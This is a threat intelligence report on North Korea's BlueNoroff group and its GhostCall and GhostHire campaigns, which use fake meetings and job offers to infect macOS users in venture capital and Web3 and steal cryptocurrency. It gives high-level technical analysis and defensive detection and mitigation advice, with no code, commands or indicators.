Executive Summary

BlueNoroff (also known as APT38 or Sapphire Sleet), the financially motivated subgroup of North Korea's infamous Lazarus Group, has launched two new, highly sophisticated campaigns named 'GhostCall' and 'GhostHire'. Research from Kaspersky reveals these operations deploy a new arsenal of malware targeting macOS systems, a departure from the group's more frequent focus on Windows. The campaigns, active since at least April 2025, use elaborate social engineering lures—including fake job offers and investment opportunities enhanced with AI—to compromise executives in venture capital and developers in the Web3 and cryptocurrency industries. The ultimate goal is the theft of cryptocurrency assets.

Threat Overview

The two campaigns are part of BlueNoroff's broader 'SnatchCrypto' operation and demonstrate the group's increasing sophistication and focus on high-value targets in the financial and tech sectors.

• GhostCall Campaign: Attackers pose as investors or entrepreneurs on Telegram and invite targets to a virtual meeting. They direct the victim to a convincing phishing page masquerading as a Zoom or Microsoft Teams website. During the fake call, which uses pre-recorded audio to appear legitimate, the attacker claims there is an audio issue and tricks the target into running a malicious script to 'fix' it. This script initiates a multi-stage infection.

• GhostHire Campaign: This campaign targets Web3 developers with fake job offers. Attackers posing as recruiters convince the developer to download a malicious GitHub repository for a supposed skills assessment, which then deploys a payload tailored to the victim's operating system.

Kaspersky's investigation uncovered at least seven multi-stage execution chains and noted the attackers' use of AI to improve their productivity and refine their social engineering tactics.

Technical Analysis

BlueNoroff's new campaigns show a significant investment in developing malware for macOS, a platform often perceived as more secure.

• Initial Access: The primary vector is highly targeted social engineering (T1566.002 - Spearphishing Link) delivered via platforms like Telegram.
• Execution: The initial payload is often a malicious script downloaded from a fake meeting site or a GitHub repository.
• Malware Suite: The infection chain deploys a suite of custom malware, including:
  • Keyloggers to capture passwords and other sensitive input.
  • A custom stealer designed to find and exfiltrate cryptocurrency wallet files, browser data, and session cookies.
  • Backdoors to provide persistent access to the compromised system.
• Defense Evasion: The use of legitimate platforms like GitHub and convincing phishing sites for Zoom and Teams helps the attackers bypass initial suspicion. The multi-stage nature of the infection also helps to evade detection by deploying payloads piece by piece.

Impact Assessment

A successful compromise by BlueNoroff can lead to significant financial losses for both individuals and companies. By targeting venture capital executives and Web3 developers, the group aims to gain access to corporate or project treasuries containing large amounts of cryptocurrency. The impact includes:

• Direct Financial Theft: Loss of cryptocurrency assets from personal or corporate wallets.
• Intellectual Property Theft: Stealing proprietary code or investment strategies from Web3 projects and VC firms.
• Reputational Damage: The association with a North Korean state-sponsored cyberattack can damage the reputation of the affected firms.

Victims have been identified in Japan, Italy, France, Singapore, Turkey, Spain, Sweden, India, Hong Kong, and Australia.

IOCs

No specific Indicators of Compromise (IOCs) were provided in the source articles.

Cyber Observables for Detection

Detection & Response

1. Endpoint Security for macOS: Deploy EDR solutions with strong macOS support to detect and block malicious scripts and unsigned binaries.
2. User Awareness Training: Educate high-risk employees (executives, developers) about these specific social engineering tactics, including fake meeting invites and job offers on platforms like Telegram.
3. Process Monitoring: On macOS, monitor for suspicious shell script execution, especially those that download additional files or attempt to escalate privileges.
4. D3FEND Techniques:
   • D3-EAL: Executable Allowlisting can prevent the execution of the malicious downloaders.
   • D3-UBA: User Behavior Analysis could potentially flag anomalous developer behavior, such as cloning an untrusted GitHub repository.

Mitigation

1. Software Sourcing: Enforce strict policies requiring employees to download software only from official sources, such as the Apple App Store or verified vendor websites. Never install software from a link sent via chat.
2. Scrutinize Communications: Be highly skeptical of unsolicited contact on platforms like Telegram, especially when it involves job offers or investment opportunities. Verify the identity of the person through separate, trusted channels.
3. Hardware Wallets: For storing significant cryptocurrency assets, use hardware wallets that keep private keys offline and are immune to malware on the host computer.
4. Limit Privileges: Operate on user accounts with standard, non-administrative privileges for daily tasks to limit the scope of what malware can do upon execution.
5. D3FEND Countermeasures:
   • D3-ACH: Application Configuration Hardening can be applied to browsers and other clients to reduce the attack surface.
   • D3-DO: Decoy Object, such as a fake cryptocurrency wallet file, could be used to detect and alert on stealer activity.